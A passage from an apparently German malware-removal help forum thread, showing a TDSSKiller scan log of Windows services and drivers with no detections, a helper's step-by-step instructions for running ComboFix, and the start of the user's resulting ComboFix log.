18:05:03.0973 5600 [ C70D69A918B178D3C3B06339B40C2E1B ] Serial C:\Windows\system32\drivers\serial.sys
18:05:04.0023 5600 Serial - ok
18:05:04.0053 5600 [ 8AF3D28A879BF75DB53A0EE7A4289624 ] sermouse C:\Windows\system32\drivers\sermouse.sys
18:05:04.0073 5600 sermouse - ok
18:05:04.0103 5600 [ D2193326F729B163125610DBF3E17D57 ] SessionEnv C:\Windows\system32\sessenv.dll
18:05:04.0133 5600 SessionEnv - ok
18:05:04.0153 5600 [ 103B79418DA647736EE95645F305F68A ] sffdisk C:\Windows\system32\drivers\sffdisk.sys
18:05:04.0193 5600 sffdisk - ok
18:05:04.0213 5600 [ 8FD08A310645FE872EEEC6E08C6BF3EE ] sffp_mmc C:\Windows\system32\drivers\sffp_mmc.sys
18:05:04.0263 5600 sffp_mmc - ok
18:05:04.0293 5600 [ 9CFA05FCFCB7124E69CFC812B72F9614 ] sffp_sd C:\Windows\system32\drivers\sffp_sd.sys
18:05:04.0343 5600 sffp_sd - ok
18:05:04.0353 5600 [ 46ED8E91793B2E6F848015445A0AC188 ] sfloppy C:\Windows\system32\drivers\sfloppy.sys
18:05:04.0393 5600 sfloppy - ok
18:05:04.0413 5600 [ E1499BD0FF76B1B2FBBF1AF339D91165 ] SharedAccess C:\Windows\System32\ipnathlp.dll
18:05:04.0443 5600 SharedAccess - ok
18:05:04.0473 5600 [ C7230FBEE14437716701C15BE02C27B8 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
18:05:04.0513 5600 ShellHWDetection - ok
18:05:04.0543 5600 [ D2A595D6EEBEEAF4334F8E50EFBC9931 ] sisagp C:\Windows\system32\drivers\sisagp.sys
18:05:04.0553 5600 sisagp - ok
18:05:04.0563 5600 [ CEDD6F4E7D84E9F98B34B3FE988373AA ] SiSRaid2 C:\Windows\system32\drivers\sisraid2.sys
18:05:04.0573 5600 SiSRaid2 - ok
18:05:04.0593 5600 [ DF843C528C4F69D12CE41CE462E973A7 ] SiSRaid4 C:\Windows\system32\drivers\sisraid4.sys
18:05:04.0603 5600 SiSRaid4 - ok
18:05:04.0713 5600 [ 862BB4CBC05D80C5B45BE430E5EF872F ] slsvc C:\Windows\system32\SLsvc.exe
18:05:05.0003 5600 slsvc - ok
18:05:05.0033 5600 [ 6EDC422215CD78AA8A9CDE6B30ABBD35 ] SLUINotify C:\Windows\system32\SLUINotify.dll
18:05:05.0053 5600 SLUINotify - ok
18:05:05.0083 5600 [ 7B75299A4D201D6A6533603D6914AB04 ] Smb C:\Windows\system32\DRIVERS\smb.sys
18:05:05.0113 5600 Smb - ok
18:05:05.0153 5600 [ 2A146A055B4401C16EE62D18B8E2A032 ] SNMPTRAP C:\Windows\System32\snmptrap.exe
18:05:05.0173 5600 SNMPTRAP - ok
18:05:05.0243 5600 [ 50660E6B082A7BF86751A003C3BB5210 ] SNP2UVC C:\Windows\system32\DRIVERS\snp2uvc.sys
18:05:05.0333 5600 SNP2UVC - ok
18:05:05.0363 5600 [ 7AEBDEEF071FE28B0EEF2CDD69102BFF ] spldr C:\Windows\system32\drivers\spldr.sys
18:05:05.0383 5600 spldr - ok
18:05:05.0403 5600 [ 8554097E5136C3BF9F69FE578A1B35F4 ] Spooler C:\Windows\System32\spoolsv.exe
18:05:05.0443 5600 Spooler - ok
18:05:05.0473 5600 [ 41987F9FC0E61ADF54F581E15029AD91 ] srv C:\Windows\system32\DRIVERS\srv.sys
18:05:05.0503 5600 srv - ok
18:05:05.0523 5600 [ FF33AFF99564B1AA534F58868CBE41EF ] srv2 C:\Windows\system32\DRIVERS\srv2.sys
18:05:05.0553 5600 srv2 - ok
18:05:05.0563 5600 [ 7605C0E1D01A08F3ECD743F38B834A44 ] srvnet C:\Windows\system32\DRIVERS\srvnet.sys
18:05:05.0583 5600 srvnet - ok
18:05:05.0613 5600 [ 03D50B37234967433A5EA5BA72BC0B62 ] SSDPSRV C:\Windows\System32\ssdpsrv.dll
18:05:05.0643 5600 SSDPSRV - ok
18:05:05.0673 5600 [ A36EE93698802CD899F98BFD553D8185 ] ssmdrv C:\Windows\system32\DRIVERS\ssmdrv.sys
18:05:05.0683 5600 ssmdrv - ok
18:05:05.0703 5600 [ 6F1A32E7B7B30F004D9A20AFADB14944 ] SstpSvc C:\Windows\system32\sstpsvc.dll
18:05:05.0723 5600 SstpSvc - ok
18:05:05.0763 5600 [ 5DE7D67E49B88F5F07F3E53C4B92A352 ] stisvc C:\Windows\System32\wiaservc.dll
18:05:05.0823 5600 stisvc - ok
18:05:05.0853 5600 [ 7BA58ECF0C0A9A69D44B3DCA62BECF56 ] swenum C:\Windows\system32\DRIVERS\swenum.sys
18:05:05.0863 5600 swenum - ok
18:05:05.0903 5600 [ F21FD248040681CCA1FB6C9A03AAA93D ] swprv C:\Windows\System32\swprv.dll
18:05:05.0933 5600 swprv - ok
18:05:05.0963 5600 [ 192AA3AC01DF071B541094F251DEED10 ] Symc8xx C:\Windows\system32\drivers\symc8xx.sys
18:05:05.0973 5600 Symc8xx - ok
18:05:06.0003 5600 [ 8C8EB8C76736EBAF3B13B633B2E64125 ] Sym_hi C:\Windows\system32\drivers\sym_hi.sys
18:05:06.0013 5600 Sym_hi - ok
18:05:06.0033 5600 [ 8072AF52B5FD103BBBA387A1E49F62CB ] Sym_u3 C:\Windows\system32\drivers\sym_u3.sys
18:05:06.0044 5600 Sym_u3 - ok
18:05:06.0093 5600 [ 0E8676FB3BB95AA40FDF7A4A31018C8B ] SynTP C:\Windows\system32\DRIVERS\SynTP.sys
18:05:06.0158 5600 SynTP - ok
18:05:06.0217 5600 [ 9A51B04E9886AA4EE90093586B0BA88D ] SysMain C:\Windows\system32\sysmain.dll
18:05:06.0256 5600 SysMain - ok
18:05:06.0279 5600 [ 2DCA225EAE15F42C0933E998EE0231C3 ] TabletInputService C:\Windows\System32\TabSvc.dll
18:05:06.0298 5600 TabletInputService - ok
18:05:06.0324 5600 [ FD90A16CEB10D4FDAA00AAF39B8FF58F ] taphss C:\Windows\system32\DRIVERS\taphss.sys
18:05:06.0336 5600 taphss - ok
18:05:06.0372 5600 [ D7673E4B38CE21EE54C59EEEB65E2483 ] TapiSrv C:\Windows\System32\tapisrv.dll
18:05:06.0401 5600 TapiSrv - ok
18:05:06.0436 5600 [ CB05822CD9CC6C688168E113C603DBE7 ] TBS C:\Windows\System32\tbssvc.dll
18:05:06.0466 5600 TBS - ok
18:05:06.0526 5600 [ 74E2D020C47BB2B2FCCBA29A518A7EB4 ] Tcpip C:\Windows\system32\drivers\tcpip.sys
18:05:06.0561 5600 Tcpip - ok
18:05:06.0579 5600 [ 74E2D020C47BB2B2FCCBA29A518A7EB4 ] Tcpip6 C:\Windows\system32\DRIVERS\tcpip.sys
18:05:06.0660 5600 Tcpip6 - ok
18:05:06.0690 5600 [ 608C345A255D82A6289C2D468EB41FD7 ] tcpipreg C:\Windows\system32\drivers\tcpipreg.sys
18:05:06.0716 5600 tcpipreg - ok
18:05:06.0743 5600 [ 5DCF5E267BE67A1AE926F2DF77FBCC56 ] TDPIPE C:\Windows\system32\drivers\tdpipe.sys
18:05:06.0769 5600 TDPIPE - ok
18:05:06.0829 5600 [ 389C63E32B3CEFED425B61ED92D3F021 ] TDTCP C:\Windows\system32\drivers\tdtcp.sys
18:05:06.0855 5600 TDTCP - ok
18:05:06.0893 5600 [ 76B06EB8A01FC8624D699E7045303E54 ] tdx C:\Windows\system32\DRIVERS\tdx.sys
18:05:06.0915 5600 tdx - ok
18:05:07.0127 5600 [ 9F3E7CABE86BBDECA009DE291DB6D9E2 ] TeamViewer8 C:\Program Files\TeamViewer\Version8\TeamViewer_Service.exe
18:05:07.0811 5600 TeamViewer8 - ok
18:05:07.0857 5600 [ 3CAD38910468EAB9A6479E2F01DB43C7 ] TermDD C:\Windows\system32\DRIVERS\termdd.sys
18:05:07.0873 5600 TermDD - ok
18:05:07.0904 5600 [ BB95DA09BEF6E7A131BFF3BA5032090D ] TermService C:\Windows\System32\termsrv.dll
18:05:07.0935 5600 TermService - ok
18:05:07.0951 5600 [ C7230FBEE14437716701C15BE02C27B8 ] Themes C:\Windows\system32\shsvcs.dll
18:05:07.0982 5600 Themes - ok
18:05:07.0998 5600 [ 1076FFCFFAAE8385FD62DFCB25AC4708 ] THREADORDER C:\Windows\system32\mmcss.dll
18:05:08.0018 5600 THREADORDER - ok
18:05:08.0038 5600 [ EC74E77D0EB004BD3A809B5F8FB8C2CE ] TrkWks C:\Windows\System32\trkwks.dll
18:05:08.0068 5600 TrkWks - ok
18:05:08.0098 5600 [ 97D9D6A04E3AD9B6C626B9931DB78DBA ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
18:05:08.0118 5600 TrustedInstaller - ok
18:05:08.0148 5600 [ DCF0F056A2E4F52287264F5AB29CF206 ] tssecsrv C:\Windows\system32\DRIVERS\tssecsrv.sys
18:05:08.0178 5600 tssecsrv - ok
18:05:08.0198 5600 [ CAECC0120AC49E3D2F758B9169872D38 ] tunmp C:\Windows\system32\DRIVERS\tunmp.sys
18:05:08.0228 5600 tunmp - ok
18:05:08.0238 5600 [ 300DB877AC094FEAB0BE7688C3454A9C ] tunnel C:\Windows\system32\DRIVERS\tunnel.sys
18:05:08.0258 5600 tunnel - ok
18:05:08.0288 5600 [ C3ADE15414120033A36C0F293D4A4121 ] uagp35 C:\Windows\system32\drivers\uagp35.sys
18:05:08.0298 5600 uagp35 - ok
18:05:08.0328 5600 [ D9728AF68C4C7693CB100B8441CBDEC6 ] udfs C:\Windows\system32\DRIVERS\udfs.sys
18:05:08.0358 5600 udfs - ok
18:05:08.0388 5600 [ ECEF404F62863755951E09C802C94AD5 ] UI0Detect C:\Windows\system32\UI0Detect.exe
18:05:08.0418 5600 UI0Detect - ok
18:05:08.0428 5600 [ 75E6890EBFCE0841D3291B02E7A8BDB0 ] uliagpkx C:\Windows\system32\drivers\uliagpkx.sys
18:05:08.0448 5600 uliagpkx - ok
18:05:08.0468 5600 [ 3CD4EA35A6221B85DCC25DAA46313F8D ] uliahci C:\Windows\system32\drivers\uliahci.sys
18:05:08.0488 5600 uliahci - ok
18:05:08.0498 5600 [ 8514D0E5CD0534467C5FC61BE94A569F ] UlSata C:\Windows\system32\drivers\ulsata.sys
18:05:08.0508 5600 UlSata - ok
18:05:08.0528 5600 [ 38C3C6E62B157A6BC46594FADA45C62B ] ulsata2 C:\Windows\system32\drivers\ulsata2.sys
18:05:08.0538 5600 ulsata2 - ok
18:05:08.0568 5600 [ 32CFF9F809AE9AED85464492BF3E32D2 ] umbus C:\Windows\system32\DRIVERS\umbus.sys
18:05:08.0588 5600 umbus - ok
18:05:08.0618 5600 [ 68308183F4AE0BE7BF8ECD07CB297999 ] upnphost C:\Windows\System32\upnphost.dll
18:05:08.0658 5600 upnphost - ok
18:05:08.0678 5600 [ EAFE1E00739AFE6C51487A050E772E17 ] USBAAPL C:\Windows\system32\Drivers\usbaapl.sys
18:05:08.0698 5600 USBAAPL - ok
18:05:08.0748 5600 [ CAF811AE4C147FFCD5B51750C7F09142 ] usbccgp C:\Windows\system32\DRIVERS\usbccgp.sys
18:05:08.0768 5600 usbccgp - ok
18:05:08.0808 5600 [ E9476E6C486E76BC4898074768FB7131 ] usbcir C:\Windows\system32\drivers\usbcir.sys
18:05:08.0858 5600 usbcir - ok
18:05:08.0868 5600 [ 79E96C23A97CE7B8F14D310DA2DB0C9B ] usbehci C:\Windows\system32\DRIVERS\usbehci.sys
18:05:08.0888 5600 usbehci - ok
18:05:08.0918 5600 [ 4673BBCB006AF60E7ABDDBE7A130BA42 ] usbhub C:\Windows\system32\DRIVERS\usbhub.sys
18:05:08.0938 5600 usbhub - ok
18:05:08.0968 5600 [ 38DBC7DD6CC5A72011F187425384388B ] usbohci C:\Windows\system32\drivers\usbohci.sys
18:05:09.0008 5600 usbohci - ok
18:05:09.0038 5600 [ E75C4B5269091D15A2E7DC0B6D35F2F5 ] usbprint C:\Windows\system32\DRIVERS\usbprint.sys
18:05:09.0068 5600 usbprint - ok
18:05:09.0083 5600 [ A508C9BD8724980512136B039BBA65E9 ] usbscan C:\Windows\system32\DRIVERS\usbscan.sys
18:05:09.0102 5600 usbscan - ok
18:05:09.0125 5600 [ BE3DA31C191BC222D9AD503C5224F2AD ] USBSTOR C:\Windows\system32\DRIVERS\USBSTOR.SYS
18:05:09.0146 5600 USBSTOR - ok
18:05:09.0174 5600 [ 814D653EFC4D48BE3B04A307ECEFF56F ] usbuhci C:\Windows\system32\DRIVERS\usbuhci.sys
18:05:09.0195 5600 usbuhci - ok
18:05:09.0222 5600 [ E67998E8F14CB0627A769F6530BCB352 ] usbvideo C:\Windows\system32\Drivers\usbvideo.sys
18:05:09.0248 5600 usbvideo - ok
18:05:09.0273 5600 [ 1509E705F3AC1D474C92454A5C2DD81F ] UxSms C:\Windows\System32\uxsms.dll
18:05:09.0296 5600 UxSms - ok
18:05:09.0335 5600 [ CD88D1B7776DC17A119049742EC07EB4 ] vds C:\Windows\System32\vds.exe
18:05:09.0365 5600 vds - ok
18:05:09.0396 5600 [ 7D92BE0028ECDEDEC74617009084B5EF ] vga C:\Windows\system32\DRIVERS\vgapnp.sys
18:05:09.0443 5600 vga - ok
18:05:09.0468 5600 [ 2E93AC0A1D8C79D019DB6C51F036636C ] VgaSave C:\Windows\System32\drivers\vga.sys
18:05:09.0496 5600 VgaSave - ok
18:05:09.0507 5600 [ 045D9961E591CF0674A920B6BA3BA5CB ] viaagp C:\Windows\system32\drivers\viaagp.sys
18:05:09.0521 5600 viaagp - ok
18:05:09.0533 5600 [ 56A4DE5F02F2E88182B0981119B4DD98 ] ViaC7 C:\Windows\system32\drivers\viac7.sys
18:05:09.0579 5600 ViaC7 - ok
18:05:09.0600 5600 [ FD2E3175FCADA350C7AB4521DCA187EC ] viaide C:\Windows\system32\drivers\viaide.sys
18:05:09.0614 5600 viaide - ok
18:05:09.0635 5600 [ 69503668AC66C77C6CD7AF86FBDF8C43 ] volmgr C:\Windows\system32\drivers\volmgr.sys
18:05:09.0648 5600 volmgr - ok
18:05:09.0679 5600 [ 23E41B834759917BFD6B9A0D625D0C28 ] volmgrx C:\Windows\system32\drivers\volmgrx.sys
18:05:09.0697 5600 volmgrx - ok
18:05:09.0732 5600 [ 786DB5771F05EF300390399F626BF30A ] volsnap C:\Windows\system32\drivers\volsnap.sys
18:05:09.0751 5600 volsnap - ok
18:05:09.0777 5600 [ D984439746D42B30FC65A4C3546C6829 ] vsmraid C:\Windows\system32\drivers\vsmraid.sys
18:05:09.0790 5600 vsmraid - ok
18:05:09.0843 5600 [ DB3D19F850C6EB32BDCB9BC0836ACDDB ] VSS C:\Windows\system32\vssvc.exe
18:05:09.0886 5600 VSS - ok
18:05:09.0943 5600 [ 96EA68B9EB310A69C25EBB0282B2B9DE ] W32Time C:\Windows\system32\w32time.dll
18:05:09.0974 5600 W32Time - ok
18:05:09.0993 5600 [ 48DFEE8F1AF7C8235D4E626F0C4FE031 ] WacomPen C:\Windows\system32\drivers\wacompen.sys
18:05:10.0057 5600 WacomPen - ok
18:05:10.0088 5600 [ 55201897378CCA7AF8B5EFD874374A26 ] Wanarp C:\Windows\system32\DRIVERS\wanarp.sys
18:05:10.0089 5600 Wanarp - ok
18:05:10.0120 5600 [ 55201897378CCA7AF8B5EFD874374A26 ] Wanarpv6 C:\Windows\system32\DRIVERS\wanarp.sys
18:05:10.0136 5600 Wanarpv6 - ok
18:05:10.0167 5600 [ A3CD60FD826381B49F03832590E069AF ] wcncsvc C:\Windows\System32\wcncsvc.dll
18:05:10.0198 5600 wcncsvc - ok
18:05:10.0230 5600 [ 11BCB7AFCDD7AADACB5746F544D3A9C7 ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
18:05:10.0245 5600 WcsPlugInService - ok
18:05:10.0292 5600 [ AFC5AD65B991C1E205CF25CFDBF7A6F4 ] Wd C:\Windows\system32\drivers\wd.sys
18:05:10.0292 5600 Wd - ok
18:05:10.0339 5600 [ A840213F1ACDCC175B4D1D5AAEAC0D7A ] Wdf01000 C:\Windows\system32\drivers\Wdf01000.sys
18:05:10.0370 5600 Wdf01000 - ok
18:05:10.0401 5600 [ ABFC76B48BB6C96E3338D8943C5D93B5 ] WdiServiceHost C:\Windows\system32\wdi.dll
18:05:10.0432 5600 WdiServiceHost - ok
18:05:10.0432 5600 [ ABFC76B48BB6C96E3338D8943C5D93B5 ] WdiSystemHost C:\Windows\system32\wdi.dll
18:05:10.0464 5600 WdiSystemHost - ok
18:05:10.0495 5600 [ 04C37D8107320312FBAE09926103D5E2 ] WebClient C:\Windows\System32\webclnt.dll
18:05:10.0505 5600 WebClient - ok
18:05:10.0525 5600 [ AE3736E7E8892241C23E4EBBB7453B60 ] Wecsvc C:\Windows\system32\wecsvc.dll
18:05:10.0555 5600 Wecsvc - ok
18:05:10.0585 5600 [ 670FF720071ED741206D69BD995EA453 ] wercplsupport C:\Windows\System32\wercplsupport.dll
18:05:10.0605 5600 wercplsupport - ok
18:05:10.0635 5600 [ 32B88481D3B326DA6DEB07B1D03481E7 ] WerSvc C:\Windows\System32\WerSvc.dll
18:05:10.0665 5600 WerSvc - ok
18:05:10.0705 5600 [ 4575AA12561C5648483403541D0D7F2B ] WinDefend C:\Program Files\Windows Defender\mpsvc.dll
18:05:10.0725 5600 WinDefend - ok
18:05:10.0735 5600 WinHttpAutoProxySvc - ok
18:05:10.0785 5600 [ 6B2A1D0E80110E3D04E6863C6E62FD8A ] Winmgmt C:\Windows\system32\wbem\WMIsvc.dll
18:05:10.0815 5600 Winmgmt - ok
18:05:10.0865 5600 [ 7CFE68BDC065E55AA5E8421607037511 ] WinRM C:\Windows\system32\WsmSvc.dll
18:05:10.0925 5600 WinRM - ok
18:05:10.0985 5600 [ C008405E4FEEB069E30DA1D823910234 ] Wlansvc C:\Windows\System32\wlansvc.dll
18:05:11.0015 5600 Wlansvc - ok
18:05:11.0045 5600 [ 2E7255D172DF0B8283CDFB7B433B864E ] WmiAcpi C:\Windows\system32\DRIVERS\wmiacpi.sys
18:05:11.0065 5600 WmiAcpi - ok
18:05:11.0105 5600 [ 43BE3875207DCB62A85C8C49970B66CC ] wmiApSrv C:\Windows\system32\wbem\WmiApSrv.exe
18:05:11.0125 5600 wmiApSrv - ok
18:05:11.0185 5600 [ 3978704576A121A9204F8CC49A301A9B ] WMPNetworkSvc C:\Program Files\Windows Media Player\wmpnetwk.exe
18:05:11.0225 5600 WMPNetworkSvc - ok
18:05:11.0275 5600 [ CFC5A04558F5070CEE3E3A7809F3FF52 ] WPCSvc C:\Windows\System32\wpcsvc.dll
18:05:11.0295 5600 WPCSvc - ok
18:05:11.0315 5600 [ 801FBDB89D472B3C467EB112A0FC9246 ] WPDBusEnum C:\Windows\system32\wpdbusenum.dll
18:05:11.0345 5600 WPDBusEnum - ok
18:05:11.0375 5600 [ DE9D36F91A4DF3D911626643DEBF11EA ] WpdUsb C:\Windows\system32\DRIVERS\wpdusb.sys
18:05:11.0385 5600 WpdUsb - ok
18:05:11.0465 5600 [ DCF3E3EDF5109EE8BC02FE6E1F045795 ] WPFFontCache_v0400 C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe
18:05:11.0495 5600 WPFFontCache_v0400 - ok
18:05:11.0505 5600 [ E3A3CB253C0EC2494D4A61F5E43A389C ] ws2ifsl C:\Windows\system32\drivers\ws2ifsl.sys
18:05:11.0535 5600 ws2ifsl - ok
18:05:11.0565 5600 [ 1CA6C40261DDC0425987980D0CD2AAAB ] wscsvc C:\Windows\System32\wscsvc.dll
18:05:11.0585 5600 wscsvc - ok
18:05:11.0595 5600 WSearch - ok
18:05:11.0655 5600 [ FC3EC24FCE372C89423E015A2AC1A31E ] wuauserv C:\Windows\system32\wuaueng.dll
18:05:11.0785 5600 wuauserv - ok
18:05:11.0815 5600 [ 06E6F32C8D0A3F66D956F57B43A2E070 ] WudfPf C:\Windows\system32\drivers\WudfPf.sys
18:05:11.0835 5600 WudfPf - ok
18:05:11.0855 5600 [ 867C301E8B790040AE9CF6486E8041DF ] WUDFRd C:\Windows\system32\DRIVERS\WUDFRd.sys
18:05:11.0865 5600 WUDFRd - ok
18:05:11.0905 5600 [ FE47B7BC8EA320C2D9B5E5BF6E303765 ] wudfsvc C:\Windows\System32\WUDFSvc.dll
18:05:11.0925 5600 wudfsvc - ok
18:05:11.0955 5600 [ C6CA0CC2F7FCDCFE5B551335BFE6D696 ] yukonwlh C:\Windows\system32\DRIVERS\yk60x86.sys
18:05:11.0995 5600 yukonwlh - ok
18:05:12.0005 5600 ================ Scan global ===============================
18:05:12.0035 5600 [ F31EEBC1A1C81FD04005489CC3DCDFE7 ] C:\Windows\system32\basesrv.dll
18:05:12.0055 5600 [ D2293B069E4B63DC17B2F08D45E71124 ] C:\Windows\system32\winsrv.dll
18:05:12.0075 5600 [ D2293B069E4B63DC17B2F08D45E71124 ] C:\Windows\system32\winsrv.dll
18:05:12.0096 5600 [ D4E6D91C1349B7BFB3599A6ADA56851B ] C:\Windows\system32\services.exe
18:05:12.0100 5600 [Global] - ok
18:05:12.0102 5600 ================ Scan MBR ==================================
18:05:12.0115 5600 [ 5C616939100B85E558DA92B899A0FC36 ] \Device\Harddisk0\DR0
18:05:12.0731 5600 \Device\Harddisk0\DR0 - ok
18:05:12.0735 5600 [ 5FB38429D5D77768867C76DCBDB35194 ] \Device\Harddisk1\DR1
18:05:12.0856 5600 \Device\Harddisk1\DR1 - ok
18:05:12.0867 5600 [ 8F558EB6672622401DA993E1E865C861 ] \Device\Harddisk2\DR2
18:05:12.0982 5600 \Device\Harddisk2\DR2 - ok
18:05:12.0985 5600 ================ Scan VBR ==================================
18:05:12.0986 5600 [ 961EA6BC3F5CD34DA67B2EEE8AA84D1B ] \Device\Harddisk0\DR0\Partition1
18:05:12.0989 5600 \Device\Harddisk0\DR0\Partition1 - ok
18:05:13.0018 5600 [ 758AD88425527B05E4FA98631C162C08 ] \Device\Harddisk0\DR0\Partition2
18:05:13.0019 5600 \Device\Harddisk0\DR0\Partition2 - ok
18:05:13.0032 5600 [ EFF1ECE495ECBDEA78E34410A05FC2D3 ] \Device\Harddisk0\DR0\Partition3
18:05:13.0033 5600 \Device\Harddisk0\DR0\Partition3 - ok
18:05:13.0039 5600 [ D894F5CF2FC97000C4CD292863AEACC0 ] \Device\Harddisk1\DR1\Partition1
18:05:13.0040 5600 \Device\Harddisk1\DR1\Partition1 - ok
18:05:13.0047 5600 [ B40BC0A08101F64916E605AE52C91653 ] \Device\Harddisk2\DR2\Partition1
18:05:13.0050 5600 \Device\Harddisk2\DR2\Partition1 - ok
18:05:13.0051 5600 ============================================================
18:05:13.0051 5600 Scan finished
18:05:13.0051 5600 ============================================================
18:05:13.0062 5928 Detected object count: 0
18:05:13.0062 5928 Actual detected object count: 0

Sehr gut.
Scan mit Combofix

WARNUNG an die MITLESER:
Combofix sollte ausschließlich ausgeführt werden, wenn dies von einem Teammitglied angewiesen wurde!

Downloade dir bitte Combofix vom folgenden Downloadspiegel: Link

WICHTIG: Speichere Combofix auf deinem Desktop.

Deaktiviere bitte alle deine Antivirensoftware sowie Malware/Spyware Scanner. Diese können Combofix bei der Arbeit stören. Combofix meckert auch manchmal trotzdem noch, das kannst du dann ignorieren, mir aber bitte mitteilen.

Starte die Combofix.exe und folge den Anweisungen auf dem Bildschirm.

Während Combofix läuft bitte nicht am Computer arbeiten, die Maus bewegen oder ins Combofixfenster klicken!

Wenn Combofix fertig ist, wird es ein Logfile erstellen.

Bitte poste die C:\Combofix.txt in deiner nächsten Antwort (möglichst in CODE-Tags).

Hinweis: Solltest du nach dem Neustart folgende Fehlermeldung erhalten
Es wurde versucht, einen Registrierungsschlüssel einem ungültigen Vorgang zu unterziehen, der zum Löschen markiert wurde.
starte den Rechner einfach neu. Dies sollte das Problem beheben.

Das hat glaube ich leider nicht so geklappt wie es sollte. Das Programm zeigt mir für etwa eine Minute an, dass gescannt wird. Anschließend erhalte ich diesen Bluescreen: hxxp://www.fotos-hochladen.net/uploads/fr52size1024oy5w3knrm2.jpg

Der Computer wird danach neu gestartet, folgende Fehlermeldung erscheint: hxxp://www.fotos-hochladen.net/uploads/fr53size1024aftzce0bx5.jpg

starte neu, drücke f8 wähle abgesicherter Modus. melde dich in deinem Konto an.
starte combofix erneut, speichere das log und gehe in den normalen modus. dann poste es

Das hat nun ohne Probleme funktioniert. Hier ist die Log-Datei:

Combofix Logfile:

Code:

ComboFix 13-02-18.02 - TuS 19.02.2013  19:23:12.1.2 - x86 NETWORK

Microsoft® Windows Vista™ Home Basic   6.0.6002.2.1252.49.1031.18.1976.1552 [GMT 1:00]

ausgeführt von:: c:\users\TuS\Desktop\ComboFix.exe

AV: Avira Desktop *Enabled/Updated* {F67B4DE5-C0B4-6C3F-0EFF-6C83BD5D0C2C}

SP: Avira Desktop *Enabled/Updated* {4D1AAC01-E68E-63B1-344F-57F1C6DA4691}

SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

.

.

((((((((((((((((((((((((((((((((((((   Weitere Löschungen   ))))))))))))))))))))))))))))))))))))))))))))))))

.

.

c:\programdata\ntuser.dat

c:\windows\unin0407.exe

G:\Autorun.inf

.

.

(((((((((((((((((((((((   Dateien erstellt von 2013-01-19 bis 2013-02-19  ))))))))))))))))))))))))))))))

.

.

2013-02-19 18:29 . 2013-02-19 18:29        --------        d-----w-        c:\users\TuS\AppData\Local\temp

2013-02-19 18:29 . 2013-02-19 18:29        --------        d-----w-        c:\users\Default\AppData\Local\temp

2013-02-19 14:17 . 2013-01-08 04:57        6991832        ----a-w-        c:\programdata\Microsoft\Windows Defender\Definition Updates\{6D45505C-6106-4259-9FB1-03C54D00EBCA}\mpengine.dll

2013-02-19 09:35 . 2013-02-19 09:35        --------        d-----w-        c:\windows\system32\IO

2013-02-18 21:34 . 2013-02-18 21:57        --------        d-----w-        c:\users\TuS\AppData\Roaming\Notepad++

2013-02-18 21:34 . 2013-02-18 21:35        --------        d-----w-        c:\program files\Notepad++

2013-02-15 08:20 . 2013-01-04 01:38        2048512        ----a-w-        c:\windows\system32\win32k.sys

2013-02-15 08:20 . 2012-11-08 03:48        1314816        ----a-w-        c:\windows\system32\quartz.dll

2013-02-15 08:20 . 2013-01-04 11:28        905576        ----a-w-        c:\windows\system32\drivers\tcpip.sys

2013-02-15 08:20 . 2013-01-05 05:26        3550072        ----a-w-        c:\windows\system32\ntoskrnl.exe

2013-02-15 08:20 . 2013-01-05 05:26        3602808        ----a-w-        c:\windows\system32\ntkrnlpa.exe

2013-01-29 18:19 . 2013-01-29 18:19        --------        d-----w-        c:\program files\MP3Gain

2013-01-24 20:00 . 2013-01-24 20:00        159744        ----a-w-        c:\program files\Internet Explorer\Plugins\npqtplugin7.dll

2013-01-24 20:00 . 2013-01-24 20:00        159744        ----a-w-        c:\program files\Internet Explorer\Plugins\npqtplugin6.dll

2013-01-24 20:00 . 2013-01-24 20:00        159744        ----a-w-        c:\program files\Internet Explorer\Plugins\npqtplugin5.dll

2013-01-24 20:00 . 2013-01-24 20:00        159744        ----a-w-        c:\program files\Internet Explorer\Plugins\npqtplugin4.dll

2013-01-24 20:00 . 2013-01-24 20:00        159744        ----a-w-        c:\program files\Internet Explorer\Plugins\npqtplugin3.dll

2013-01-24 20:00 . 2013-01-24 20:00        159744        ----a-w-        c:\program files\Internet Explorer\Plugins\npqtplugin2.dll

2013-01-24 20:00 . 2013-01-24 20:00        159744        ----a-w-        c:\program files\Internet Explorer\Plugins\npqtplugin.dll

2013-01-24 19:59 . 2013-01-24 20:00        --------        d-----w-        c:\program files\QuickTime

2013-01-24 17:46 . 2013-01-24 17:46        --------        d-----w-        c:\users\TuS\AppData\Roaming\Malwarebytes

2013-01-24 17:45 . 2013-01-24 17:45        --------        d-----w-        c:\programdata\Malwarebytes

.

.

.

((((((((((((((((((((((((((((((((((((   Find3M Bericht   ))))))))))))))))))))))))))))))))))))))))))))))))))))))

.

2013-02-08 15:58 . 2012-06-10 18:25        697712        ----a-w-        c:\windows\system32\FlashPlayerApp.exe

2013-02-08 15:58 . 2011-06-09 19:25        74096        ----a-w-        c:\windows\system32\FlashPlayerCPLApp.cpl

2013-01-17 00:28 . 2011-02-19 11:29        232336        ------w-        c:\windows\system32\MpSigStub.exe

2012-12-22 15:58 . 2012-12-22 15:59        93640        ----a-w-        c:\windows\system32\WindowsAccessBridge.dll

2012-12-22 15:58 . 2012-09-03 12:56        859072        ----a-w-        c:\windows\system32\npdeployJava1.dll

2012-12-22 15:58 . 2011-06-09 19:13        779704        ----a-w-        c:\windows\system32\deployJava1.dll

2012-12-16 13:12 . 2012-12-22 11:13        34304        ----a-w-        c:\windows\system32\atmlib.dll

2012-12-16 10:50 . 2012-12-22 11:13        293376        ----a-w-        c:\windows\system32\atmfd.dll

2013-02-08 15:40 . 2013-02-08 15:39        262552        ----a-w-        c:\program files\mozilla firefox\components\browsercomps.dll

.

.

((((((((((((((((((((((((((((   Autostartpunkte der Registrierung   ))))))))))))))))))))))))))))))))))))))))

.

.

*Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt. 

REGEDIT4

.

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"RocketDock"="c:\program files\RocketDock\RocketDock.exe" [2007-09-02 495616]

"WMPNSCFG"="c:\program files\Windows Media Player\WMPNSCFG.exe" [2008-01-19 202240]

.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"IgfxTray"="c:\windows\system32\igfxtray.exe" [2008-11-06 150040]

